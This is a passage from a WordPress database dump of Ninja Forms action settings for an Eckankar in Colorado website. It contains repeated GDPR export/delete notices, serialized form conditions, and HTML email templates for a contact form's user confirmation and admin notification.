end.'),(3557,75,'submitter_email','','submitter_email',''),(3558,75,'fields-save-toggle','save_all','fields-save-toggle','save_all'),(3559,75,'exception_fields','a:0:{}','exception_fields','a:0:{}'),(3560,75,'set_subs_to_expire','0','set_subs_to_expire','0'),(3561,75,'subs_expire_time','90','subs_expire_time','90'),(3562,76,'message','This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.','message','This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.'),(3563,77,'message','This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.','message','This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.'),(3564,77,'submitter_email','','submitter_email',''),(3565,77,'fields-save-toggle','save_all','fields-save-toggle','save_all'),(3566,77,'exception_fields','a:0:{}','exception_fields','a:0:{}'),(3567,77,'set_subs_to_expire','0','set_subs_to_expire','0'),(3568,77,'subs_expire_time','90','subs_expire_time','90'),(3569,78,'message','This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.','message','This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.'),(3570,79,'message','This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.','message','This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.'),(3571,79,'submitter_email','','submitter_email',''),(3572,79,'fields-save-toggle','save_all','fields-save-toggle','save_all'),(3573,79,'exception_fields','a:0:{}','exception_fields','a:0:{}'),(3574,79,'set_subs_to_expire','0','set_subs_to_expire','0'),(3575,79,'subs_expire_time','90','subs_expire_time','90'),(3576,80,'message','This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.','message','This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.'),(3577,85,'message','This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.','message','This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.'),(3578,85,'submitter_email','','submitter_email',''),(3579,85,'fields-save-toggle','save_all','fields-save-toggle','save_all'),(3580,85,'exception_fields','a:0:{}','exception_fields','a:0:{}'),(3581,85,'set_subs_to_expire','0','set_subs_to_expire','0'),(3582,85,'subs_expire_time','90','subs_expire_time','90'),(3583,86,'message','This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.','message','This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.'),(3584,87,'message','This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.','message','This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.'),(3585,87,'submitter_email','','submitter_email',''),(3586,87,'fields-save-toggle','save_all','fields-save-toggle','save_all'),(3587,87,'exception_fields','a:0:{}','exception_fields','a:0:{}'),(3588,87,'set_subs_to_expire','0','set_subs_to_expire','0'),(3589,87,'subs_expire_time','90','subs_expire_time','90'),(3590,88,'message','This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.','message','This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.'),(3591,89,'message','This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.','message','This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.'),(3592,89,'submitter_email','','submitter_email',''),(3593,89,'fields-save-toggle','save_all','fields-save-toggle','save_all'),(3594,89,'exception_fields','a:0:{}','exception_fields','a:0:{}'),(3595,89,'set_subs_to_expire','0','set_subs_to_expire','0'),(3596,89,'subs_expire_time','90','subs_expire_time','90'),(3597,90,'message','This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.','message','This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.'),(3598,91,'message','This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.','message','This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.'),(3599,91,'submitter_email','','submitter_email',''),(3600,91,'fields-save-toggle','save_all','fields-save-toggle','save_all'),(3601,91,'exception_fields','a:0:{}','exception_fields','a:0:{}'),(3602,91,'set_subs_to_expire','0','set_subs_to_expire','0'),(3603,91,'subs_expire_time','90','subs_expire_time','90'),(3604,92,'message','This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.','message','This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.'),(3605,93,'message','This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.','message','This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.'),(3606,93,'submitter_email','','submitter_email',''),(3607,93,'fields-save-toggle','save_all','fields-save-toggle','save_all'),(3608,93,'exception_fields','a:0:{}','exception_fields','a:0:{}'),(3609,93,'set_subs_to_expire','0','set_subs_to_expire','0'),(3610,93,'subs_expire_time','90','subs_expire_time','90'),(3611,94,'message','This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.','message','This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.'),(3612,95,'message','This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.','message','This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.'),(3613,95,'submitter_email','','submitter_email',''),(3614,95,'fields-save-toggle','save_all','fields-save-toggle','save_all'),(3615,95,'exception_fields','a:0:{}','exception_fields','a:0:{}'),(3616,95,'set_subs_to_expire','0','set_subs_to_expire','0'),(3617,95,'subs_expire_time','90','subs_expire_time','90'),(3618,96,'message','This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.','message','This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.'),(3619,97,'objectType','Action','objectType','Action'),(3620,97,'objectDomain','actions','objectDomain','actions'),(3621,97,'editActive','','editActive',''),(3622,97,'message','This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.','message','This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.'),(3623,97,'payment_gateways','','payment_gateways',''),(3624,97,'payment_total','0','payment_total','0'),(3625,97,'tag','','tag',''),(3626,97,'to','{wp:admin_email}','to','{wp:admin_email}'),(3627,97,'reply_to','','reply_to',''),(3628,97,'email_subject','Ninja Forms Submission','email_subject','Ninja Forms Submission'),(3629,97,'email_message','{fields_table}','email_message','{fields_table}'),(3630,97,'email_message_plain','','email_message_plain',''),(3631,97,'from_name','','from_name',''),(3632,97,'from_address','','from_address',''),(3633,97,'email_format','html','email_format','html'),(3634,97,'cc','','cc',''),(3635,97,'bcc','','bcc',''),(3636,97,'redirect_url','','redirect_url',''),(3637,97,'submitter_email','','submitter_email',''),(3638,97,'fields-save-toggle','save_all','fields-save-toggle','save_all'),(3639,97,'exception_fields','a:0:{}','exception_fields','a:0:{}'),(3640,97,'set_subs_to_expire','0','set_subs_to_expire','0'),(3641,97,'subs_expire_time','90','subs_expire_time','90'),(3642,98,'objectType','Action','objectType','Action'),(3643,98,'objectDomain','actions','objectDomain','actions'),(3644,98,'editActive','','editActive',''),(3645,98,'message','This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.','message','This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.'),(3646,98,'payment_gateways','','payment_gateways',''),(3647,98,'payment_total','0','payment_total','0'),(3648,98,'tag','','tag',''),(3649,98,'email_message_plain','','email_message_plain',''),(3650,99,'objectType','Action','objectType','Action'),(3651,99,'objectDomain','actions','objectDomain','actions'),(3652,99,'editActive','','editActive',''),(3653,99,'message','This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.','message','This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.'),(3654,99,'payment_gateways','','payment_gateways',''),(3655,99,'payment_total','0','payment_total','0'),(3656,99,'tag','','tag',''),(3657,99,'email_message_plain','','email_message_plain',''),(3658,99,'submitter_email','','submitter_email',''),(3659,99,'fields-save-toggle','save_all','fields-save-toggle','save_all'),(3660,99,'exception_fields','a:0:{}','exception_fields','a:0:{}'),(3661,99,'set_subs_to_expire','0','set_subs_to_expire','0'),(3662,99,'subs_expire_time','90','subs_expire_time','90'),(3663,100,'objectType','Action','objectType','Action'),(3664,100,'objectDomain','actions','objectDomain','actions'),(3665,100,'editActive','','editActive',''),(3666,100,'message','This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.','message','This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.'),(3667,100,'payment_gateways','','payment_gateways',''),(3668,100,'payment_total','0','payment_total','0'),(3669,100,'tag','','tag',''),(3670,100,'email_message_plain','','email_message_plain',''),(3671,125,'title','','title',''),(3672,125,'key','','key',''),(3673,125,'type','save','type','save'),(3674,125,'active','1','active','1'),(3675,125,'created_at','2018-01-03 11:43:34','created_at','2018-01-03 11:43:34'),(3676,125,'label','Save Form','label','Save Form'),(3677,125,'objectType','Action','objectType','Action'),(3678,125,'objectDomain','actions','objectDomain','actions'),(3679,125,'editActive','','editActive',''),(3680,125,'conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}','conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}'),(3681,125,'payment_gateways','','payment_gateways',''),(3682,125,'payment_total','0','payment_total','0'),(3683,125,'tag','','tag',''),(3684,125,'to','{wp:admin_email}','to','{wp:admin_email}'),(3685,125,'reply_to','','reply_to',''),(3686,125,'email_subject','Ninja Forms Submission','email_subject','Ninja Forms Submission'),(3687,125,'email_message','{fields_table}','email_message','{fields_table}'),(3688,125,'email_message_plain','','email_message_plain',''),(3689,125,'from_name','','from_name',''),(3690,125,'from_address','','from_address',''),(3691,125,'email_format','html','email_format','html'),(3692,125,'cc','','cc',''),(3693,125,'bcc','','bcc',''),(3694,125,'redirect_url','','redirect_url',''),(3695,125,'message','This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.','message','This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.'),(3696,125,'submitter_email','','submitter_email',''),(3697,125,'fields-save-toggle','save_all','fields-save-toggle','save_all'),(3698,125,'exception_fields','a:0:{}','exception_fields','a:0:{}'),(3699,125,'set_subs_to_expire','0','set_subs_to_expire','0'),(3700,125,'subs_expire_time','90','subs_expire_time','90'),(3701,125,'parent_id','6','parent_id','6'),(3702,126,'title','','title',''),(3703,126,'key','','key',''),(3704,126,'type','email','type','email'),(3705,126,'active','1','active','1'),(3706,126,'created_at','2018-01-03 11:43:34','created_at','2018-01-03 11:43:34'),(3707,126,'date_updated','2016-01-15','date_updated','2016-01-15'),(3708,126,'attach_csv','0','attach_csv','0'),(3709,126,'email_format','html','email_format','html'),(3710,126,'reply_to','','reply_to',''),(3711,126,'cc','','cc',''),(3712,126,'bcc','','bcc',''),(3713,126,'redirect_url','','redirect_url',''),(3714,126,'success_msg','','success_msg',''),(3715,126,'from_name','Eckankar In Colorado','from_name','Eckankar In Colorado'),(3716,126,'from_address','webmaster@eckankar-colorado.org','from_address','webmaster@eckankar-colorado.org'),(3717,126,'to','{field:email_96}','to','{field:email_96}'),(3718,126,'email_subject','Boulder Area Initiator and ESA Contacts','email_subject','Boulder Area Initiator and ESA Contacts'),(3719,126,'label','Send copy to user','label','Send copy to user'),(3720,126,'objectType','Action','objectType','Action'),(3721,126,'objectDomain','actions','objectDomain','actions'),(3722,126,'editActive','','editActive',''),(3723,126,'conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}','conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}'),(3724,126,'payment_gateways','','payment_gateways',''),(3725,126,'payment_total','0','payment_total','0'),(3726,126,'tag','','tag',''),(3727,126,'email_message_plain','','email_message_plain',''),(3728,126,'message','This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.','message','This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.'),(3729,126,'parent_id','6','parent_id','6'),(3730,126,'email_message','<br><br><br><br><br><br><br><br><br><br><br><br><table id=\"bodyTable\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr>\n<td valign=\"top\" align=\"center\"><br><br>\n<br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><table id=\"emailContainer\" width=\"800\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr>\n<td valign=\"top\" align=\"left\"><br><br>\n<br><br><br><br><br><br><br><br><br><br><br><br><br><br><table id=\"emailHeader\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr>\n<td style=\"background-color: #ebebeb;padding-left: 10px;color: #23507d;line-height: 80%\" valign=\"top\" align=\"left<br ></td><br />\n                                \"><br><br>\n<h1>Eckankar In Colorado</h1><br><br>\n</td>\n<td>&nbsp;</td>\n</tr>\n</tbody>\n</table><br><br>\n</td>\n</tr>\n<tr>\n<td valign=\"top\" align=\"center\"><br><br>\n<br><br><br><br><br><br><br><br><br><br><br><br><table id=\"emailBody\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\" border=\"0\">\n<tbody>\n<tr>\n<td valign=\"top\" align=\"left\"><br><br>\n<p><strong>Hello {field:textbox_94},</strong></p><br><br>\n<p>Thanks for getting in touch! You have created a new form submission on the Eckankar In Colorado website requesting contact with a person on the Boulder Colorado Leadership Communications team.</p><br><br>\n<p>Here is a copy of the information that you have submitted:</p><br><br>\n</td>\n</tr>\n</tbody>\n</table><br><br>\n<br><br><br><br><br><br><br><br><br><br><br><br><table id=\"emailHeader\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\" border=\"0\">\n<tbody>\n<tr>\n<td style=\"background-color: #ebebeb;padding: 10px;border: 1px solid #cccccc\" valign=\"top\" align=\"left<br ></td><br />\n                                \"><br><br>\n<p><span style=\"color: #333333\"><strong>FIRST NAME:</strong> {field:textbox_94}<br><br><br>\n </span><span style=\"color: #333333\"><strong>LAST NAME:</strong> {field:lastname_95}<br><br><br>\n </span><span style=\"color: #333333\"><strong>EMAIL:</strong> {field:email_96}<br><br><br>\n </span><span style=\"color: #333333\"><strong>TELEPHONE:</strong> {field:phone_97}</span><br><br><br>\n <span style=\"color: #333333\"><strong>LOCAL AREA:</strong> {field:listselect_98}<br><br><br>\n </span><span style=\"color: #333333\"><strong>PERSON YOU WOULD LIKE TO CONTACT:</strong> {field:select_the_person_you_would_like_to_contact_1613166297230}</span></p><br><br>\n<p><span style=\"color: #333333\"><strong>MESSAGE: </strong>{field:textarea_102}</span></p><br><br>\n</td>\n</tr>\n</tbody>\n</table><br><br>\n</td>\n</tr>\n<tr>\n<td valign=\"top\" align=\"center\"><br><br>\n<br><br><br><br><br><br><br><br><br><br><br><br><table id=\"emailFooter\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\" border=\"0\">\n<tbody>\n<tr>\n<td valign=\"top\" align=\"left\"><br><br>\n<p>Your submission is being forwarded to the person that you have selected and you will be contacted soon.</p><br><br>\n<br><br>\nIf you have any questions regarding the origin of this form, please feel free to contact the<br><br><br>\n Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org<br><br>\n<br><br>\n<p style=\"color: #23507d\"><em>Your Eckankar in Colorado Team<br><br><br>\n <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em></p><br><br>\n</td>\n</tr>\n</tbody>\n</table><br><br>\n</td>\n</tr>\n</tbody>\n</table><br><br>\n</td>\n</tr>\n</tbody>\n</table><br><br>\n<p>&nbsp;</p>','email_message','<br><br><br><br><br><br><br><br><br><br><br><br><table id=\"bodyTable\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr>\n<td valign=\"top\" align=\"center\"><br><br>\n<br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><table id=\"emailContainer\" width=\"800\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr>\n<td valign=\"top\" align=\"left\"><br><br>\n<br><br><br><br><br><br><br><br><br><br><br><br><br><br><table id=\"emailHeader\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr>\n<td style=\"background-color: #ebebeb;padding-left: 10px;color: #23507d;line-height: 80%\" valign=\"top\" align=\"left<br ></td><br />\n                                \"><br><br>\n<h1>Eckankar In Colorado</h1><br><br>\n</td>\n<td>&nbsp;</td>\n</tr>\n</tbody>\n</table><br><br>\n</td>\n</tr>\n<tr>\n<td valign=\"top\" align=\"center\"><br><br>\n<br><br><br><br><br><br><br><br><br><br><br><br><table id=\"emailBody\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\" border=\"0\">\n<tbody>\n<tr>\n<td valign=\"top\" align=\"left\"><br><br>\n<p><strong>Hello {field:textbox_94},</strong></p><br><br>\n<p>Thanks for getting in touch! You have created a new form submission on the Eckankar In Colorado website requesting contact with a person on the Boulder Colorado Leadership Communications team.</p><br><br>\n<p>Here is a copy of the information that you have submitted:</p><br><br>\n</td>\n</tr>\n</tbody>\n</table><br><br>\n<br><br><br><br><br><br><br><br><br><br><br><br><table id=\"emailHeader\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\" border=\"0\">\n<tbody>\n<tr>\n<td style=\"background-color: #ebebeb;padding: 10px;border: 1px solid #cccccc\" valign=\"top\" align=\"left<br ></td><br />\n                                \"><br><br>\n<p><span style=\"color: #333333\"><strong>FIRST NAME:</strong> {field:textbox_94}<br><br><br>\n </span><span style=\"color: #333333\"><strong>LAST NAME:</strong> {field:lastname_95}<br><br><br>\n </span><span style=\"color: #333333\"><strong>EMAIL:</strong> {field:email_96}<br><br><br>\n </span><span style=\"color: #333333\"><strong>TELEPHONE:</strong> {field:phone_97}</span><br><br><br>\n <span style=\"color: #333333\"><strong>LOCAL AREA:</strong> {field:listselect_98}<br><br><br>\n </span><span style=\"color: #333333\"><strong>PERSON YOU WOULD LIKE TO CONTACT:</strong> {field:select_the_person_you_would_like_to_contact_1613166297230}</span></p><br><br>\n<p><span style=\"color: #333333\"><strong>MESSAGE: </strong>{field:textarea_102}</span></p><br><br>\n</td>\n</tr>\n</tbody>\n</table><br><br>\n</td>\n</tr>\n<tr>\n<td valign=\"top\" align=\"center\"><br><br>\n<br><br><br><br><br><br><br><br><br><br><br><br><table id=\"emailFooter\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\" border=\"0\">\n<tbody>\n<tr>\n<td valign=\"top\" align=\"left\"><br><br>\n<p>Your submission is being forwarded to the person that you have selected and you will be contacted soon.</p><br><br>\n<br><br>\nIf you have any questions regarding the origin of this form, please feel free to contact the<br><br><br>\n Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org<br><br>\n<br><br>\n<p style=\"color: #23507d\"><em>Your Eckankar in Colorado Team<br><br><br>\n <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em></p><br><br>\n</td>\n</tr>\n</tbody>\n</table><br><br>\n</td>\n</tr>\n</tbody>\n</table><br><br>\n</td>\n</tr>\n</tbody>\n</table><br><br>\n<p>&nbsp;</p>'),(3731,127,'title','','title',''),(3732,127,'key','','key',''),(3733,127,'type','successmessage','type','successmessage'),(3734,127,'active','1','active','1'),(3735,127,'created_at','2018-01-03 11:43:34','created_at','2018-01-03 11:43:34'),(3736,127,'date_updated','2016-01-15','date_updated','2016-01-15'),(3737,127,'success_msg','<div style=\"text-align: center; width: 60%;margin: auto; padding-top: 80px; padding-bottom: 80px\"><span style=\"font-size: 38pt\"><span style=\"color: #23507d\"><strong>Thank You!</strong></span></span><p> <span style=\"font-size: 18pt\">We appreciate you taking the time to communicate with us. You will be contacted soon regarding your submission.</span></p>\n</div>','success_msg','<div style=\"text-align: center; width: 60%;margin: auto; padding-top: 80px; padding-bottom: 80px\"><span style=\"font-size: 38pt\"><span style=\"color: #23507d\"><strong>Thank You!</strong></span></span><p> <span style=\"font-size: 18pt\">We appreciate you taking the time to communicate with us. You will be contacted soon regarding your submission.</span></p>\n</div>'),(3738,127,'from_name','','from_name',''),(3739,127,'from_address','','from_address',''),(3740,127,'to','{wp:admin_email}','to','{wp:admin_email}'),(3741,127,'email_subject','Ninja Forms Submission','email_subject','Ninja Forms Submission'),(3742,127,'email_message','{fields_table}','email_message','{fields_table}'),(3743,127,'attach_csv','0','attach_csv','0'),(3744,127,'email_format','html','email_format','html'),(3745,127,'reply_to','','reply_to',''),(3746,127,'cc','','cc',''),(3747,127,'bcc','','bcc',''),(3748,127,'redirect_url','','redirect_url',''),(3749,127,'label','Success Message','label','Success Message'),(3750,127,'objectType','Action','objectType','Action'),(3751,127,'objectDomain','actions','objectDomain','actions'),(3752,127,'editActive','','editActive',''),(3753,127,'conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}','conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}'),(3754,127,'payment_gateways','','payment_gateways',''),(3755,127,'payment_total','0','payment_total','0'),(3756,127,'tag','','tag',''),(3757,127,'email_message_plain','','email_message_plain',''),(3758,127,'message','This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.','message','This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.'),(3759,127,'submitter_email','','submitter_email',''),(3760,127,'fields-save-toggle','save_all','fields-save-toggle','save_all'),(3761,127,'exception_fields','a:0:{}','exception_fields','a:0:{}'),(3762,127,'set_subs_to_expire','0','set_subs_to_expire','0'),(3763,127,'subs_expire_time','90','subs_expire_time','90'),(3764,127,'parent_id','6','parent_id','6'),(3765,128,'title','','title',''),(3766,128,'key','','key',''),(3767,128,'type','email','type','email'),(3768,128,'active','1','active','1'),(3769,128,'created_at','2018-01-03 11:43:34','created_at','2018-01-03 11:43:34'),(3770,128,'date_updated','2016-01-19','date_updated','2016-01-19'),(3771,128,'from_name','Boulder Area Initiator and ESA Contacts','from_name','Boulder Area Initiator and ESA Contacts'),(3772,128,'from_address','webmaster@eckankar-colorado.org','from_address','webmaster@eckankar-colorado.org'),(3773,128,'to','webmaster@eckankar-colorado.org','to','webmaster@eckankar-colorado.org'),(3774,128,'email_subject','ECK Colorado Website - Form Record Received','email_subject','ECK Colorado Website - Form Record Received'),(3775,128,'attach_csv','0','attach_csv','0'),(3776,128,'email_format','html','email_format','html'),(3777,128,'reply_to','','reply_to',''),(3778,128,'cc','','cc',''),(3779,128,'bcc','','bcc',''),(3780,128,'redirect_url','','redirect_url',''),(3781,128,'success_msg','','success_msg',''),(3782,128,'label','Admin Email','label','Admin Email'),(3783,128,'objectType','Action','objectType','Action'),(3784,128,'objectDomain','actions','objectDomain','actions'),(3785,128,'editActive','','editActive',''),(3786,128,'conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}','conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}'),(3787,128,'payment_gateways','','payment_gateways',''),(3788,128,'payment_total','0','payment_total','0'),(3789,128,'tag','','tag',''),(3790,128,'email_message_plain','','email_message_plain',''),(3791,128,'drawerDisabled','','drawerDisabled',''),(3792,128,'message','This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.','message','This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.'),(3793,128,'parent_id','6','parent_id','6'),(3794,128,'email_message','<table id=\"bodyTable\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailContainer\" border=\"0\" width=\"800\" cellspacing=\"0\" cellpadding=\"10\"><br /><br 